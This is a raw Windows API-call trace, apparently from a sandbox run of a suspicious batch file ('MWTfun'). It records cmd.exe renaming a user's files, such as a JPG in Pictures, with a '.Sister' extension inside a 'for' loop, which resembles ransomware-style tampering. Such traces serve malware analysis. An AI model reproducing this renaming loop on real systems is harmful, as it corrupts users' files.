RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cea180, Size=0x490) returned 0x21ed8cea180 [0292.806] GetProcessHeap () returned 0x21ed8c70000 [0292.806] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cea180) returned 0x490 [0292.806] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0292.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.806] GetFileType (hFile=0x50) returned 0x2 [0292.806] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.806] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0292.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.807] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0292.813] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.813] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.813] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0292.813] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.813] GetFileType (hFile=0x50) returned 0x2 [0292.813] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.813] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0292.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.814] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0292.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.814] GetFileType (hFile=0x50) returned 0x2 [0292.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.814] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.814] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cea150*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8cea150*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0292.815] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0292.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.815] GetFileType (hFile=0x50) returned 0x2 [0292.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.815] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0292.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.815] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0292.821] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0292.821] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.821] GetFileType (hFile=0x50) returned 0x2 [0292.821] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.821] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0292.822] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.822] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0292.825] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0292.826] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0292.826] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0292.826] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.826] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.826] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0292.826] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0292.826] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0292.826] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0292.826] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0292.826] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0292.826] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0292.826] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0292.826] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0292.826] ??_V@YAXPEAX@Z () returned 0x1 [0292.826] GetProcessHeap () returned 0x21ed8c70000 [0292.826] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0292.826] GetProcessHeap () returned 0x21ed8c70000 [0292.826] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed8d62090 [0292.826] GetProcessHeap () returned 0x21ed8c70000 [0292.826] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62090) returned 0x130 [0292.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.827] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.827] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.827] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.827] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed981fb40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0292.839] ??_V@YAXPEAX@Z () returned 0x1 [0292.839] GetProcessHeap () returned 0x21ed8c70000 [0292.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62a90 [0292.839] GetProcessHeap () returned 0x21ed8c70000 [0292.839] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f4c0 [0292.839] GetProcessHeap () returned 0x21ed8c70000 [0292.839] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f4c0, Size=0x130) returned 0x21ed8d62450 [0292.839] GetProcessHeap () returned 0x21ed8c70000 [0292.840] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62450) returned 0x130 [0292.840] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.840] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.840] GetProcessHeap () returned 0x21ed8c70000 [0292.840] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cca0 [0292.840] GetProcessHeap () returned 0x21ed8c70000 [0292.840] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5ab60 [0292.840] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.840] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.840] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.840] GetLastError () returned 0x2 [0292.840] GetProcessHeap () returned 0x21ed8c70000 [0292.840] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cea620 [0292.842] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cea630 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.842] SetErrorMode (uMode=0x0) returned 0x0 [0292.842] SetErrorMode (uMode=0x1) returned 0x0 [0292.842] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed981fb40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0292.842] SetErrorMode (uMode=0x0) returned 0x1 [0292.842] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0292.842] GetProcessHeap () returned 0x21ed8c70000 [0292.842] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d260 [0292.842] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0292.842] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0292.842] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.842] GetLastError () returned 0x2 [0292.843] ??_V@YAXPEAX@Z () returned 0x1 [0292.843] malloc (_Size=0xffce) returned 0x21ed981fb40 [0292.843] ??_V@YAXPEAX@Z () returned 0x21ed981fb40 [0292.843] malloc (_Size=0xffce) returned 0x21ed982fb20 [0292.843] ??_V@YAXPEAX@Z () returned 0x21ed982fb20 [0292.843] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0292.843] GetLastError () returned 0x2 [0292.843] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.843] GetFileType (hFile=0x54) returned 0x2 [0292.843] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0292.843] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0292.844] _get_osfhandle (_FileHandle=2) returned 0x54 [0292.844] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0292.844] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.844] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0292.844] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0292.872] longjmp () [0292.872] ??_V@YAXPEAX@Z () returned 0x1 [0292.872] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0292.872] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="E8sv92vO_xVbOO.jpg", cAlternateFileName="")) returned 1 [0292.872] GetProcessHeap () returned 0x21ed8c70000 [0292.872] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66290, Size=0xbc) returned 0x21ed8d6a2e0 [0292.873] GetProcessHeap () returned 0x21ed8c70000 [0292.873] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a2e0) returned 0xbc [0292.873] GetProcessHeap () returned 0x21ed8c70000 [0292.873] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfa610 [0292.873] GetProcessHeap () returned 0x21ed8c70000 [0292.873] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfa610, Size=0x30) returned 0x21ed8cfa610 [0292.873] GetProcessHeap () returned 0x21ed8c70000 [0292.873] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfa610) returned 0x30 [0292.873] GetProcessHeap () returned 0x21ed8c70000 [0292.873] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfa650 [0292.874] malloc (_Size=0x1ff9c) returned 0x21ed983fb00 [0292.874] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8b10 [0292.875] ??_V@YAXPEAX@Z () returned 0x1 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfa650, Size=0x1a0) returned 0x21ed8cfa650 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfa650) returned 0x1a0 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfa800 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfa800, Size=0x290) returned 0x21ed8cfa800 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfa800) returned 0x290 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfaaa0 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfaaa0, Size=0x30) returned 0x21ed8cfaaa0 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfaaa0) returned 0x30 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfaae0 [0292.875] malloc (_Size=0x1ff9c) returned 0x21ed983fb00 [0292.875] GetProcessHeap () returned 0x21ed8c70000 [0292.875] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8d10 [0292.875] ??_V@YAXPEAX@Z () returned 0x1 [0292.875] malloc (_Size=0x1ff9c) returned 0x21ed983fb00 [0292.875] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.877] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.878] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cd00 [0292.878] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0292.878] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd9213d94, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd9213d94, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7c9a0 [0292.878] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.878] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x4, dwReserved1=0x7, cFileName="E8sv92vO_xVbOO.jpg", cAlternateFileName="E8SV92~1.JPG")) returned 0x21ed8c7c9a0 [0292.879] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0292.879] _wcsnicmp (_String1="E8SV92~1.JPG", _String2="E8sv92vO_xVbOO.jpg", _MaxCount=0x12) returned 8 [0292.879] malloc (_Size=0x1ff9c) returned 0x21ed985fab0 [0292.881] ??_V@YAXPEAX@Z () returned 0x21ed985fab0 [0292.883] GetProcessHeap () returned 0x21ed8c70000 [0292.883] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8990 [0292.884] ??_V@YAXPEAX@Z () returned 0x1 [0292.884] ??_V@YAXPEAX@Z () returned 0x1 [0292.884] GetProcessHeap () returned 0x21ed8c70000 [0292.884] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfaae0, Size=0x1a0) returned 0x21ed8cfaae0 [0292.884] GetProcessHeap () returned 0x21ed8c70000 [0292.884] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfaae0) returned 0x1a0 [0292.884] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0292.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.884] GetFileType (hFile=0x50) returned 0x2 [0292.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.884] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0292.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.885] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0292.974] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0292.974] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0292.974] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0292.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.974] GetFileType (hFile=0x50) returned 0x2 [0292.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.974] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0292.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.974] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0292.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.975] GetFileType (hFile=0x50) returned 0x2 [0292.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.978] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0292.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.979] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cfa620*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cfa620*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0292.979] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"E8sv92vO_xVbOO.jpg\" \"E8sv92vO_xVbOO.jpg.Sister\" ") returned 50 [0292.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0292.979] GetFileType (hFile=0x50) returned 0x2 [0292.979] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0292.979] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.018] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0293.019] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0293.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.019] GetFileType (hFile=0x50) returned 0x2 [0293.019] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.019] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.019] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.020] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0293.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.020] GetFileType (hFile=0x50) returned 0x2 [0293.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.020] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.020] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0293.020] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0293.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.020] GetFileType (hFile=0x50) returned 0x2 [0293.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.021] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.021] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0293.021] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, 